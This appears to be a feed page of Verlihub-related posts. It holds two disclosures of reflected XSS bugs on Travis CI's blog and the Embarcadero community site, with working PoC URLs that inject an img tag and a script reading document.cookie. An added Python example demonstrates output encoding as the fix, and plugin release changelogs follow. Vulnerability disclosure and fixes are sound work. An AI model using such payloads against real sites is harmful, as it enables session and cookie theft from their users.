Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the q parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 22:54

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the search parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 13:47
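
Both posts above report the same pattern: a search parameter whose value, starting with `">`, is reflected into the page unencoded. The following is an added example, not part of the original posts or of either site's code; it assumes (the posts do not show the markup) that the term is echoed into a double-quoted value attribute, and the template and function names are hypothetical. It renders the two quoted PoC requests with and without output encoding and parses the result to show whether any element outside the template appears.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumption: the search term is echoed into a double-quoted value attribute.
TEMPLATE = '<form action="/search"><input type="text" name="q" value="{q}"></form>'
EXPECTED_TAGS = {"form", "input"}

# The two PoC requests quoted in the posts above, with their parameter names.
POCS = [
    ('https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>', "q"),
    ('https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>', "search"),
]

def query_param(url, name):
    """Decoded value of one GET parameter, as the server-side handler receives it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]

def render_unescaped(term):
    """Vulnerable pattern: the raw term is interpolated into the attribute."""
    return TEMPLATE.format(q=term)

def render_escaped(term):
    """Fix: encode &, <, > and both quote characters at the point of output."""
    return TEMPLATE.format(q=html.escape(term, quote=True))

class _Audit(HTMLParser):
    """Records tags the template never emits and the value the input ends up with."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.unexpected, self.value = [], None

    def handle_starttag(self, tag, attrs):
        if tag not in EXPECTED_TAGS:
            self.unexpected.append(tag)
        elif tag == "input":
            self.value = dict(attrs).get("value")

def audit(markup):
    """Return (unexpected tags, parsed value of the search input)."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.unexpected, parser.value

if __name__ == "__main__":
    for url, name in POCS:
        term = query_param(url, name)
        print(name, audit(render_unescaped(term)), audit(render_escaped(term)))
```

With encoding applied, the parsed input value equals the submitted term character for character, so the search box still shows what the user typed while no extra element is created.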

Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Posted by verlihub on 2018-02-19 14:18

Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Posted by ledokol on 2018-02-19 13:49

Blacklist 1.2.3.2

Changes in 1.2.3.2
# 1.2.2.7 - Added country code translation to some messages
# 1.2.2.8 - Added "prox_quote" configuration to limit amount of public proxy lookups per day
# 1.2.2.9 - Added prioritization of public proxy and my lists
# 1.2.2.9 - Removed break on first match
# 1.2.2.9 - Added "prox_getasn" configuration to show GeoIP ASN information on proxy detection
# 1.2.2.9 - Added "extry_getasn" configuration to show GeoIP ASN information on exception lookup
# 1.2.3.0 - Added "myoff" and "exoff" commands to disable or enable items in my and exception lists
# 1.2.3.0 - Added results from my list to find action
# 1.2.3.0 - Added ASN check on connection
# 1.2.3.1 - Added "asn_block" configuration for space separated list of blocked AS numbers
# 1.2.3.1 - Added "asn_except" configuration for space separated list of excepted AS numbers
# 1.2.3.2 - Added "nick_skip" configuration for space separated list of users to skip proxy lookup

File information: Blacklist 1.2.3.2
Posted by vhpython on 2018-02-19 13:21